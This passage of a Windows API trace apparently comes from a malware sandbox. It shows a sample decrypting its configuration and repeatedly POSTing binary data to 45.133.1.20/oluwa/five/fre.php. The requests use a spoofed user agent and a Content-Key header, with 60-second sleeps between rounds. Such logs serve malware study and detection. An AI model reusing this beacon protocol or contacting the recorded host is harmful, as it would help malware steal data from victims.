dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0204.716] GetProcessHeap () returned 0x6a0000 [0204.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0204.717] GetProcessHeap () returned 0x6a0000 [0204.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0204.717] GetProcessHeap () returned 0x6a0000 [0204.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0204.717] closesocket (s=0x568) returned 0 [0204.718] GetProcessHeap () returned 0x6a0000 [0204.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0204.718] GetProcessHeap () returned 0x6a0000 [0204.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0204.718] GetProcessHeap () returned 0x6a0000 [0204.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0204.719] GetProcessHeap () returned 0x6a0000 [0204.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0204.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7a0) returned 0x568 [0204.721] Sleep (dwMilliseconds=0xea60) [0204.722] GetProcessHeap () returned 0x6a0000 [0204.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0204.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.723] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.733] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0204.895] GetProcessHeap () returned 0x6a0000 [0204.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5e68 [0204.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.897] CryptImportKey (in: hProv=0x6bf278, pbData=0x6c5e68, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0204.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.898] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.899] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.899] GetProcessHeap () returned 0x6a0000 [0204.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5e68 | out: hHeap=0x6a0000) returned 1 [0205.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.012] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0205.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.014] CryptDestroyKey (hKey=0x6ad020) returned 1 [0205.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.017] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0205.017] GetProcessHeap () returned 0x6a0000 [0205.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.018] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.019] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.020] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.022] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.022] GetProcessHeap () returned 0x6a0000 [0205.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0205.022] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.022] GetProcessHeap () returned 0x6a0000 [0205.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0205.023] GetProcessHeap () returned 0x6a0000 [0205.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0205.024] GetProcessHeap () returned 0x6a0000 [0205.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0205.024] GetProcessHeap () returned 0x6a0000 [0205.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0205.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.027] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0205.044] GetProcessHeap () returned 0x6a0000 [0205.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0205.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.045] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0205.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.048] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.049] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.049] GetProcessHeap () returned 0x6a0000 [0205.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0205.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.051] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0205.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.053] CryptDestroyKey (hKey=0x6ad020) returned 1 [0205.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.054] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0205.054] GetProcessHeap () returned 0x6a0000 [0205.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.055] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0205.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.056] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0205.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.059] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0205.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.060] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0205.060] GetProcessHeap () returned 0x6a0000 [0205.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0205.060] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0205.060] GetProcessHeap () returned 0x6a0000 [0205.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0205.060] socket (af=2, type=1, protocol=6) returned 0x56c [0205.061] connect (s=0x56c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0205.088] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0205.088] GetProcessHeap () returned 0x6a0000 [0205.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0205.088] GetProcessHeap () returned 0x6a0000 [0205.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0205.089] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0205.090] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.090] GetProcessHeap () returned 0x6a0000 [0205.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0205.090] GetProcessHeap () returned 0x6a0000 [0205.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0205.091] GetProcessHeap () returned 0x6a0000 [0205.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0205.091] GetProcessHeap () returned 0x6a0000 [0205.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0205.092] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0205.093] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.093] GetProcessHeap () returned 0x6a0000 [0205.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0205.093] GetProcessHeap () returned 0x6a0000 [0205.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0205.094] send (s=0x56c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0205.095] send (s=0x56c, buf=0x6bb998*, len=159, flags=0) returned 159 [0205.095] GetProcessHeap () returned 0x6a0000 [0205.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0205.095] recv (in: s=0x56c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0205.192] GetProcessHeap () returned 0x6a0000 [0205.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0205.192] GetProcessHeap () returned 0x6a0000 [0205.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0205.193] GetProcessHeap () returned 0x6a0000 [0205.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0205.193] GetProcessHeap () returned 0x6a0000 [0205.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0205.194] closesocket (s=0x56c) returned 0 [0205.194] GetProcessHeap () returned 0x6a0000 [0205.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0205.194] GetProcessHeap () returned 0x6a0000 [0205.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0205.195] GetProcessHeap () returned 0x6a0000 [0205.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0205.195] GetProcessHeap () returned 0x6a0000 [0205.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0205.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1334) returned 0x56c [0205.198] Sleep (dwMilliseconds=0xea60) [0205.202] GetProcessHeap () returned 0x6a0000 [0205.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0205.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.203] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.215] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0205.225] GetProcessHeap () returned 0x6a0000 [0205.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0205.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.226] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0205.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.237] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.238] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.238] GetProcessHeap () returned 0x6a0000 [0205.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0205.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.240] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0205.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.241] CryptDestroyKey (hKey=0x6ad020) returned 1 [0205.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.242] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0205.242] GetProcessHeap () returned 0x6a0000 [0205.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.243] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.244] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.245] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.246] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.246] GetProcessHeap () returned 0x6a0000 [0205.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0205.246] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.246] GetProcessHeap () returned 0x6a0000 [0205.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0205.247] GetProcessHeap () returned 0x6a0000 [0205.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0205.247] GetProcessHeap () returned 0x6a0000 [0205.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0205.247] GetProcessHeap () returned 0x6a0000 [0205.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0205.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.248] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0205.261] GetProcessHeap () returned 0x6a0000 [0205.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0205.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.262] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0205.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.263] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.264] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.264] GetProcessHeap () returned 0x6a0000 [0205.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0205.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.266] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0205.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.267] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0205.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.268] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0205.268] GetProcessHeap () returned 0x6a0000 [0205.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.269] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0205.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.269] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0205.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.270] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0205.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.271] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0205.271] GetProcessHeap () returned 0x6a0000 [0205.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0205.272] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0205.272] GetProcessHeap () returned 0x6a0000 [0205.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0205.272] socket (af=2, type=1, protocol=6) returned 0x570 [0205.272] connect (s=0x570, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0205.300] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0205.300] GetProcessHeap () returned 0x6a0000 [0205.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0205.301] GetProcessHeap () returned 0x6a0000 [0205.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0205.301] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0205.302] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.302] GetProcessHeap () returned 0x6a0000 [0205.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0205.302] GetProcessHeap () returned 0x6a0000 [0205.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0205.303] GetProcessHeap () returned 0x6a0000 [0205.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0205.303] GetProcessHeap () returned 0x6a0000 [0205.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0205.304] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0205.304] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.304] GetProcessHeap () returned 0x6a0000 [0205.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0205.305] GetProcessHeap () returned 0x6a0000 [0205.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0205.305] send (s=0x570, buf=0x6b5c98*, len=242, flags=0) returned 242 [0205.305] send (s=0x570, buf=0x6bb998*, len=159, flags=0) returned 159 [0205.306] GetProcessHeap () returned 0x6a0000 [0205.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0205.306] recv (in: s=0x570, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0205.388] GetProcessHeap () returned 0x6a0000 [0205.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0205.389] GetProcessHeap () returned 0x6a0000 [0205.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0205.390] GetProcessHeap () returned 0x6a0000 [0205.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0205.390] GetProcessHeap () returned 0x6a0000 [0205.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0205.391] closesocket (s=0x570) returned 0 [0205.391] GetProcessHeap () returned 0x6a0000 [0205.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0205.391] GetProcessHeap () returned 0x6a0000 [0205.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 